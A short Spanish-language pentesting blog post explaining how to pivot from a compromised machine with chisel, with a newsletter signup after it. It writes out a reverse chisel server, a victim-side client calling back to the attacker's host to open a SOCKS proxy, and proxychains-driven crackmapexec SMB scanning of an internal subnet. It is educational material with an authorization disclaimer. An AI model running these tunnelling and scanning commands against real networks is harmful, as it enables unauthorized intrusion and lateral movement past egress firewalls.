~ / blog / pentesting
KALI

Túneles con chisel

Cuando no tienes SSH en el objetivo, chisel hace el túnel sobre HTTP, que casi siempre está permitido de salida.

Arrancas el servidor de chisel en tu máquina, y en el equipo comprometido corres el cliente, que se conecta de vuelta y abre un proxy SOCKS. Desde ahí, con proxychains, llegas a toda la red interna.

Es ligero, un solo binario, y atraviesa firewalls que solo dejan salir web. La herramienta favorita para pivotar hoy.

# los comandos

kali@kali:~$ chisel server -p 8080 --reversecopiar
server listening on 0.0.0.0:8080
victim$ ./chisel client 10.0.0.50:8080 R:sockscopiar
Connected (SOCKS proxy en el server)
kali@kali:~$ proxychains crackmapexec smb 172.16.5.0/24copiar
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.